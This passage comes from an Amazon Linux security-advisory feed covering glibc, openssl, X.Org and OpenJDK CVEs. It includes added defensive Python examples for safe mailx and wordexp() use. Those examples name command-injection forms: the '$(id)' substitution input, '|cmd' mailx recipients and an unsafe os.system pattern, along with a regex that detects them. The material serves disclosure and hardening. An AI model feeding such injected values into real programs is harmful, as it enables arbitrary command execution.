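# interpret (`, $, ;, |, whitespace, quotes, slashes) is rejected rather than quoted.
_SAFE_ADDR = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9._+=-]{0,63}"
    r"@[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)+$")


def is_safe_address(addr):
    """True only for addresses matching the narrow grammar above."""
    return len(addr) <= 254 and _SAFE_ADDR.match(addr) is not None


def mailx_argv(subject, recipients):
    """argv for mailx: options first, then '--' to end option parsing, then the recipients.
    Shell quoting is not used and would not help here, because the dangerous interpretation
    of '|cmd' or '/path' recipients happens inside mailx, after the shell is gone."""
    if not recipients:
        raise ValueError("no recipients")
    bad = [r for r in recipients if not is_safe_address(r)]
    if bad:
        raise ValueError("rejecting recipient address(es): %r" % bad)
    return ["mailx", "-s", subject, "--"] + list(recipients)


def send_mail(subject, body, recipients):
    """Run mailx directly, body on stdin, no shell involved.
    The pattern this replaces: os.system('mail -s "%s" %s' % (subject, addr))."""
    return subprocess.run(mailx_argv(subject, recipients),
                          input=body.encode(), check=True)
```

send_mail() still needs a mailx binary to be useful; is_safe_address() and mailx_argv() are the parts worth lifting into an existing script, and the regular expression is the place to widen the grammar if a legitimate address class is being refused.
]]>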
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2771" title="" id="CVE-2004-2771" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7844" title="" id="CVE-2014-7844" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1999.html" title="" id="RHSA-2014:1999" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mailx-debuginfo" version="12.4" release="8.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mailx-debuginfo-12.4-8.8.amzn1.x86_64.rpm</filename></package><package name="mailx" version="12.4" release="8.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mailx-12.4-8.8.amzn1.x86_64.rpm</filename></package><package name="mailx" version="12.4" release="8.8.amzn1" epoch="0" arch="i686"><filename>Packages/mailx-12.4-8.8.amzn1.i686.rpm</filename></package><package name="mailx-debuginfo" version="12.4" release="8.8.amzn1" epoch="0" arch="i686"><filename>Packages/mailx-debuginfo-12.4-8.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-468</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-468: medium priority package update for glibc</title><issued date="2015-01-08 12:38:00" /><updated date="2015-01-08 12:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-7817:
It was found that the wordexp() function would perform command substitution even when the WRDE_NOCMD flag was specified. An attacker able to provide specially crafted input to an application using the wordexp() function, and not sanitizing the input correctly, could potentially use this flaw to execute arbitrary commands with the credentials of the user running that application.
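<![CDATA[
Added example (Python calling the C library through ctypes; not glibc's code and not part of this advisory): how a caller should drive wordexp() on untrusted input. WRDE_NOCMD is still passed and WRDE_CMDSUB, or any other non-zero return, is treated as a hard error; in front of that sits a syntactic pre-check that refuses command-substitution syntax before the C library ever sees it, so a libc bug of the kind described above cannot be reached. The struct layout and constant values are those of glibc's wordexp.h and are an assumption about the host libc. The pre-check also rejects the "$((" arithmetic form, because the reported bypass nested a command substitution inside arithmetic expansion; that costs arithmetic expansion, which untrusted input rarely needs.

```python
import ctypes
import re

# Values from glibc's wordexp.h (assumption of this example: check your own libc's header).
WRDE_NOCMD = 4    # flag: treat command substitution as an error
WRDE_CMDSUB = 4   # return code: command substitution was requested while WRDE_NOCMD was set


class WordexpT(ctypes.Structure):
    """struct wordexp_t as laid out by glibc."""
    _fields_ = [("we_wordc", ctypes.c_size_t),
                ("we_wordv", ctypes.POINTER(ctypes.c_char_p)),
                ("we_offs", ctypes.c_size_t)]


_libc = ctypes.CDLL(None)
_libc.wordexp.argtypes = [ctypes.c_char_p, ctypes.POINTER(WordexpT), ctypes.c_int]
_libc.wordexp.restype = ctypes.c_int
_libc.wordfree.argtypes = [ctypes.POINTER(WordexpT)]
_libc.wordfree.restype = None

# Backticks and "$(" are the only two ways to request command substitution, and "$("
# also matches the "$((" arithmetic form. Quoting is ignored on purpose: a false positive
# costs one rejected input, a false negative on a buggy libc costs command execution.
_CMDSUB = re.compile(r"`|\$\(")


def has_command_substitution(word):
    return _CMDSUB.search(word) is not None


def libc_wordexp(word, flags=WRDE_NOCMD):
    """Call wordexp(3) directly; return (return_code, list_of_words)."""
    we = WordexpT()
    rc = _libc.wordexp(word.encode(), ctypes.byref(we), flags)
    if rc != 0:
        return rc, []
    try:
        return rc, [we.we_wordv[i].decode() for i in range(we.we_wordc)]
    finally:
        _libc.wordfree(ctypes.byref(we))


def safe_wordexp(word):
    """Expand untrusted input: refuse command-substitution syntax up front (defence in depth
    against a libc that mishandles WRDE_NOCMD), then still pass WRDE_NOCMD and treat every
    non-zero return, WRDE_CMDSUB included, as an error rather than partial output."""
    if has_command_substitution(word):
        raise ValueError("command substitution syntax rejected: %r" % word)
    rc, words = libc_wordexp(word, WRDE_NOCMD)
    if rc != 0:
        raise ValueError("wordexp() failed with code %d on %r" % (rc, word))
    return words
```

libc_wordexp("$(id)") returning WRDE_CMDSUB shows the flag being honoured for the plain case; the pre-check is what protects the caller if the library gets a nested case wrong.
]]>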
CVE-2014-6040:
An out-of-bounds read flaw was found in the way glibc's iconv() function converted certain encoded data to UTF-8. An attacker able to make an application call the iconv() function with a specially crafted argument could use this flaw to crash that application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6040" title="" id="CVE-2014-6040" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7817" title="" id="CVE-2014-7817" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0016.html" title="" id="RHSA-2015:0016" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glibc" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-utils-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="nscd" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/nscd-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-headers-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-static" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-static-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-debuginfo-common-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-common" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-common-2.17-55.92.amzn1.x86_64.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.92.amzn1" epoch="0" arch="x86_64"><filename>Packages/glibc-devel-2.17-55.92.amzn1.x86_64.rpm</filename></package><package 
name="glibc-common" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-common-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-devel" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-devel-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-utils" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-utils-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-debuginfo-common" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-debuginfo-common-2.17-55.92.amzn1.i686.rpm</filename></package><package name="nscd" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/nscd-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-static" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-static-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc-headers" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-headers-2.17-55.92.amzn1.i686.rpm</filename></package><package name="glibc" version="2.17" release="55.92.amzn1" epoch="0" arch="i686"><filename>Packages/glibc-2.17-55.92.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-469</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-469: medium priority package update for openssl</title><issued date="2015-01-11 12:36:00" /><updated date="2015-01-11 12:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0206:
Memory leak in the dtls1_buffer_record function in d1_pkt.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate records for the next epoch, leading to failure of replay detection.
1180235:
CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record
CVE-2015-0205:
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support.
1180239:
CVE-2015-0205 openssl: DH client certificates accepted without verification
CVE-2015-0204:
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role.
1180184:
CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites
CVE-2014-8275:
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c.
1180187:
CVE-2014-8275 openssl: Fix various certificate fingerprint issues
CVE-2014-3572:
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message.
1180185:
CVE-2014-3572 openssl: ECDH downgrade bug fix
CVE-2014-3571:
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c.
1180234:
CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record
CVE-2014-3570:
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c.
1180240:
CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
CVE-2014-3569:
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported protocols, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an unexpected handshake, as demonstrated by an SSLv3 handshake to a no-ssl3 application with certain error handling. NOTE: this issue became relevant after the CVE-2014-3568 fix.
1177249:
CVE-2014-3569 openssl: denial of service in ssl23_get_client_hello function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569" title="" id="CVE-2014-3569" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570" title="" id="CVE-2014-3570" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571" title="" id="CVE-2014-3571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572" title="" id="CVE-2014-3572" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275" title="" id="CVE-2014-8275" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204" title="" id="CVE-2015-0204" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205" title="" id="CVE-2015-0205" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206" title="" id="CVE-2015-0206" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-devel" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-1.82.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" 
release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-1.82.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-1.82.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-1.82.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-1.82.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="1.82.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-1.82.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-470</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-470: important priority package update for xorg-x11-server</title><issued date="2015-01-15 14:49:00" /><updated date="2015-01-15 14:55:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8103:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8102:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8101:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8100:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8099:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8098:
Multiple integer overflow flaws and out-of-bounds write flaws were found in the way the X.Org server calculated memory requirements for certain X11 core protocol and GLX extension requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
CVE-2014-8097:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server, or leak memory contents to the client.
CVE-2014-8096:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8095:
Multiple out-of-bounds access flaws were found in the way the X.Org server calculated memory requirements for certain requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server.
CVE-2014-8094:
An integer overflow flaw was found in the way the X.Org server calculated memory requirements for certain DRI2 extension requests. A malicious, authenticated client could use this flaw to crash the X.Org server.
CVE-2014-8093:
Multiple integer overflow flaws and out-of-bounds write flaws were found in the way the X.Org server calculated memory requirements for certain X11 core protocol and GLX extension requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
CVE-2014-8092:
Multiple integer overflow flaws and out-of-bounds write flaws were found in the way the X.Org server calculated memory requirements for certain X11 core protocol and GLX extension requests. A malicious, authenticated client could use either of these flaws to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
CVE-2014-8091:
It was found that the X.Org server did not properly handle SUN-DES-1 (Secure RPC) authentication credentials. A malicious, unauthenticated client could use this flaw to crash the X.Org server by submitting a specially crafted authentication request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8091" title="" id="CVE-2014-8091" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8092" title="" id="CVE-2014-8092" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8093" title="" id="CVE-2014-8093" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8094" title="" id="CVE-2014-8094" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8095" title="" id="CVE-2014-8095" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8096" title="" id="CVE-2014-8096" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8097" title="" id="CVE-2014-8097" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8098" title="" id="CVE-2014-8098" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8099" title="" id="CVE-2014-8099" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8100" title="" id="CVE-2014-8100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8101" title="" id="CVE-2014-8101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8102" title="" id="CVE-2014-8102" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8103" title="" id="CVE-2014-8103" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1983.html" title="" id="RHSA-2014:1983" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xorg" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package 
name="xorg-x11-server-devel" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.15.0" release="25.40.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.15.0-25.40.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.15.0" release="25.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.15.0-25.40.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.15.0" release="25.40.amzn1" 
epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.15.0-25.40.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.15.0" release="25.40.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.15.0-25.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-471</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-471: critical priority package update for java-1.7.0-openjdk</title><issued date="2015-01-22 14:18:00" /><updated date="2015-01-22 16:46:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0412:
Multiple improper permission check issues were discovered in the JAX-WS and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0410:
A flaw was found in the way the DER (Distinguished Encoding Rules) decoder in the Security component in OpenJDK handled negative length values. A specially crafted, DER-encoded input could cause a Java application to enter an infinite loop when decoded.
CVE-2015-0408:
Multiple improper permission check issues were discovered in the JAX-WS and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0407:
An information leak flaw was found in the Swing component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-0395:
A flaw was found in the way the Hotspot garbage collector handled phantom references. An untrusted Java application or applet could use this flaw to corrupt the Java Virtual Machine memory and, possibly, execute arbitrary code, bypassing Java sandbox restrictions.
CVE-2015-0383:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack.
CVE-2014-6601:
A flaw was found in the way the Hotspot component in OpenJDK verified bytecode from the class files. An untrusted Java application or applet could possibly use this flaw to bypass Java sandbox restrictions.
CVE-2014-6593:
It was discovered that the SSL/TLS implementation in the JSSE component in OpenJDK failed to properly check whether the ChangeCipherSpec was received during the SSL/TLS connection handshake. An MITM attacker could possibly use this flaw to force a connection to be established without encryption being enabled.
CVE-2014-6591:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-6587:
A NULL pointer dereference flaw was found in the MulticastSocket implementation in the Libraries component of OpenJDK. An untrusted Java application or applet could possibly use this flaw to bypass certain Java sandbox restrictions.
CVE-2014-6585:
Multiple boundary check flaws were found in the font parsing code in the 2D component in OpenJDK. A specially crafted font file could allow an untrusted Java application or applet to disclose portions of the Java Virtual Machine memory.
CVE-2014-3566:
A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.
1152789:
CVE-2014-3566 openssl: Padding Oracle On Downgraded Legacy Encryption attack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566" title="" id="CVE-2014-3566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6585" title="" id="CVE-2014-6585" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6587" title="" id="CVE-2014-6587" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6591" title="" id="CVE-2014-6591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6593" title="" id="CVE-2014-6593" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6601" title="" id="CVE-2014-6601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0383" title="" id="CVE-2015-0383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0395" title="" id="CVE-2015-0395" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0407" title="" id="CVE-2015-0407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0408" title="" id="CVE-2015-0408" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0410" title="" id="CVE-2015-0410" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0412" title="" id="CVE-2015-0412" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:0067.html" title="" id="RHSA-2015:0067" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-devel" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.75-2.5.4.0.53.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.75-2.5.4.0.53.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.75" release="2.5.4.0.53.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.75-2.5.4.0.53.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" 